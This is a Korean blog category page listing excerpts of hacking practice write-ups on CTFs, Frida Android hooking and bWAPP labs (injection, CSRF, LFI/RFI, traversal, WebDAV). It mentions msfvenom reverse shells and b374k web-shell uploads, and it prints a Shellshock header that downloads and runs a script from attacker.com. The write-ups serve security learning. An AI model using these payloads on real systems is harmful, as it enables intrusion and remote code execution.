Programming/hacking

금번 포스트는 드림핵 웹 CTF 문제인 Test Your Luck 문제를 풀이한다 . 1. 문제 검색링크로 들어 갈 시 Test Your Luck 이라는 인풋창과 반환값은 10초 뒤에 나온다는 문구가 적혀있음해당 페이지를 크롬 개발자 도구로 소스를 볼 시 태그 안 Post 요청을 보내는 메소드를 확인 할 수 있는데 매 요청 시 10초의 타임아웃이 걸리고 /guess 라는 url로 요청을 보내는 것 을 확인 할 수 있음.서버 코드는 유저의 입력값을 받아 랜덤 한 값과 비교하여 맞을 시에 플래그를 출력해주는 기능을 함.2. 문제풀이외부에서 요청을 보내 타임아웃 우회 및 브루트 포스 공격시도 2.1. 브루트포스를 위한 코드 제작 및 공격tqdm 을 통한 실시간 진행사항 확인 및 브루트 포스 공격 import ..
🔍 실습 목표OWASP의 안드로이드 보안 학습 앱인 UnCrackable Level 1을 대상으로,Frida를 활용해 앱 내부의 함수 로직을 후킹하고,UI를 통해 입력된 값을 검증하는 비밀키 비교 로직을 분석 및 복호화하는 것이 목적임.이를 통해 동적 분석 기법 및 런타임 코드 조작에 대한 실습 경험을 쌓는 것이 목표임.📦 앱 개요앱명: UnCrackable Level 1패키지명: owasp.mstg.uncrackable1실행 환경: 루팅된 기기에서 실행 시 종료됨주요 특징:루팅 탐지 기능이 포함되어 있어, Frida 사용 전 우회가 필요함특정 문자열 입력 시 내부적으로 비밀키 비교가 수행되며, 일치 여부에 따라 "Success!" 또는 "Try again." 메시지를 출력함비밀키는 하드코딩되어 있지..
UnCrackable Level 1 실습 – Frida로 안드로이드 앱 후킹🔍 실습 목표OWASP에서 제공하는 안드로이드 보안 실습 앱인 UnCrackable Level 1을 대상으로,Frida를 활용해 루팅 탐지를 우회하고 앱의 내부 로직을 분석해보는 것임.📦 앱 개요앱명: UnCrackable Level 1패키지명: owasp.mstg.uncrackable1실행 환경: 루팅 디바이스에서 실행 시 자동 종료됨이 앱은 루팅된 환경을 탐지하고 종료시키는 보안 로직이 탑재되어 있어,보안 우회 기법을 익히기에 적절한 실습 대상임.루팅 탐지 우회앱을 실행하면 아래와 같은 메시지를 출력하며 종료됨:"Root detected! App is closing..."내부적으로는 다음과 같은 조건들을 체크함:Build...
취약점PHP Code Injection위험도상상세경로( URL )192.168.2.9/bWAPP/phpi.php취약점 시나리오[1단계] 시스템 명령어 실행 가능 여부 확인웹 페이지 상에서 사용자 입력을 통해 시스템 명령어(`whoami`, `id` 등)의 실행이 가능한 것을 확인함.이는 명령어 삽입(Command Injection) 취약점에 해당하며, 시스템 권한 탈취의 첫 단초가 됨. [2단계] `msfvenom`을 활용한 백도어 생성공격자는 `msfvenom` 도구를 활용해 리버스 셸 형식의 백도어 파일 생성. 해당 코드 블록은 아래 테이블 참조.생성된 파일은 ELF 포맷으로, 리눅스 기반 서버에서 실행 가능함. [3단계] 웹 서버로 백도어 업로드취약한 파일 업로드 기능 혹은 명령어 삽입을 통해 `b..
취약점SQL Injection / GET, POST위험도상상세경로( URL )192.168.2.9/bWAPP/sqli_1.php || sqli_6.php취약점 개요SQL Injection은 사용자 입력값이 데이터베이스 쿼리에 직접 삽입될 때 발생하는 취약점으로, 공격자가 악의적인 SQL 명령을 주입해 인증 우회, 데이터 조회 및 조작 등이 가능함. 입력값 검증 없이 SQL 쿼리에 포함되면 쿼리 구조가 조작되어 의도치 않은 결과를 초래하게 됨. Prepared Statement 사용, 입력값 이스케이프, 화이트리스트 검증 등을 통해 방어할 수 있음.수행 결과 7.1) GET 요청에서 따옴표와 주석을 사용한 악의적인 SQL문 동작수행 점검그림 7.1.1 – GET 요청 테이블의 정상 동작 모습 > 그림 7...
1. HTML Injection – Reflected ( GET )취약점HTML Injection – Reflected ( GET )위험도상상세경로( URL )192.168.2.9/bWAPP/htmli_get.html취약점 개요사용자의 입력값이 필터링 없이 HTML에 삽입되어, 태그나 스크립트가 그대로 실행되는 취약점, GET 방식으로 전달된 파라미터가 즉시 반영되며, XSS로 이어질 수 있어 위험함으로.htmlspecialchars() 등으로 출력 시 이스케이프 처리해 예방권고수행 결과1.1) Input Box 에서 HTML 태그를 삽입하였을 시 화면 표출 점검그림 1.1.1 - Input Box HTML 태그 삽입 > 그림 1.1.2 - HTML 태그가 인코딩 되어 전달되는 모습 >그림 1.1.3..
금번엔 프리다랩에서 제공해주는 취약점 문제 apk를 가지고 문제 풀이를 진행하려고함프리다랩 apk는 하기의 사이트에서 제공해줌https://rossmarks.uk/blog/fridalab/ FridaLabI was struggling with a recent test using frida, knowing it could do what I want but unsure how. After lots of googling and trial and error I eventually got it working. So I decidedrossmarks.uk 준비물 1. 프리다가 설치 된 파이썬 가상환경2. jadx3. 녹스 플레이어4. fridalab.apk 프리다랩 세팅1. 프리다랩 설치 1.1. 받은 프리다랩 a..
■ Shell Shock - 발견 시기 : 2014년- 영향받는 프로그램 : Bash ( 리눅스/유닉스에서 기본적으로 쓰이는 쉘)- 취약점 번호 : CVE-2014-6271 외 다수- 설명 :Bash가 환경변수에 악성 코드를 몰래 심을 수 있게 허술하게 파싱하여 이로 비롯해 서버에 악성 환경변수만 심어주면, 원격 코드 실행 (RCE) 가능웹서버, SSH, DHCP 서버 같은 Bash 를 사용하는 프로그램 위협 공격 예시User-Agent: () { :; }; /bin/bash -c "curl http://attacker.com/malware.sh | bash"■ 대상- shell shock 취약점이 있는 사이트- 힌트에 referer header 에 취약점이 있다는 것을 알 수 있음 referer hea..
CSRF ( CROSS SITE REQUEST FORGERY, 사이트 간 위조 요청 )- 공격자가, 사용자가 사용하고 있는 브라우저를 이용해, 공격자가 조작한 HTTP Request를 웹서버에 보내는 공격방법■ 대상하기의 페이지는 로그인 된 사용자의 비밀번호를 변경하는 평범한 사이트, 해당 사이트를 버프 스위트로 프록시를 잡아보면 비밀번호 변경 요청에 대한 내용이 그대로 드러나는 것을 볼 수 있음■ 공격버프 스위트에 존재하는 HTML element Injection Brog 페이지로 넘어가 이미지 태그를 사용하여 악의적인 공격 수행 1. Img 태그를 사용한 공격- 이미지의 노출을 방지하기 위해 가로,세로폭을 0으로 줌 2. a 태그를 사용한 공격- a 태그를 사용하여 악의적인 링크를 생성할 수 있음..
LFI (Local File Inclusion)로컬 파일 포함 취약점서버에 존재하는 파일을 공격자가 포함시켜 실행하거나 내용을 확인하는 공격 RFI (Remote File Inclusion)원격 파일 포함 취약점공격자가 자신의 서버에 올려둔 파일을 불러와서 실행하게 만드는 방식■ 대상- 하기에 페이지는 이전 File traversal 취약점과 유사하게 FILE PATH 또는 FORDER PATH 로 컴퓨터 내부의 의도치 않은 내부 파일들을 열람할 수 있음, 해당 사이트에 위에서 상술한 외부에서 파일을 불러와 발생하는 RFI 취약점 공격을 해볼 것 임■ 공격1. 사전 공격 파일 작성- BWAPP 은 php 로 동작하기에 공격을 수행하기 위한 소스코드 작성간단한 alert 과 php system 함수를 ..
Directory Traversal 이란?Directory Traversal (디렉토리 트래버설)은 웹 애플리케이션에서 사용자가 파일 경로를 조작하여 원래 접근하면 안 되는 서버 내부의 파일에 접근하는 보안 취약점, 다른 말로는 Path Traversal이라고도 불림■ 대상1. Directory traversal - 대상은 폴더내에 있는 파일들에 대해서 리스트로 불러와주는 페이지로 추정- 해당 페이지의 URL 을 보면 directory 를 인자로 받는 것을 볼 수 있고 해당 인자의 파라미터로 공격수행 가능 ■ 공격- ../ 같은 상위폴더를 볼 수 있는 명령어를 통해 타 폴더 검색가능2. File traversal - 해당 페이지는 URL 에 특정 파일을 입력받아 그에 따른 내용을 출력해주는 것으로 보..
WebDAV는 Web Distributed Authoring and Versioning의 약자로, 웹 서버를 파일 서버처럼 사용할 수 있게 해주는 HTTP 기반의 프로토콜 확장■ 대상아래 대상은 웹 파일 관리자 WebDav의 권한 취약점이 있는 사이트, 아래 볼드체로 되어있는 WebDAV를 누르면 해당 사이트로 이동 가능 하기에 사이트는 별다른 접근 권한이 없는 것으로 추정 됌■ 공격 가능 유무 확인- 버프스위트로 요청을 잡은 후 GET 메소드를 PUT 메소드로 변조시켜 파일 업로드 시도 - 파일 업로드 성공 확인 ■ 공격 - 이번 공격은 한 개발자가 만든 b374k 라는 웹쉘 프로그램을 사용해 진행- 필자는 b374k2.2 버전사용https://github.com/tennc/webshell/tre..
김제주
'Programming/hacking' 카테고리의 글 목록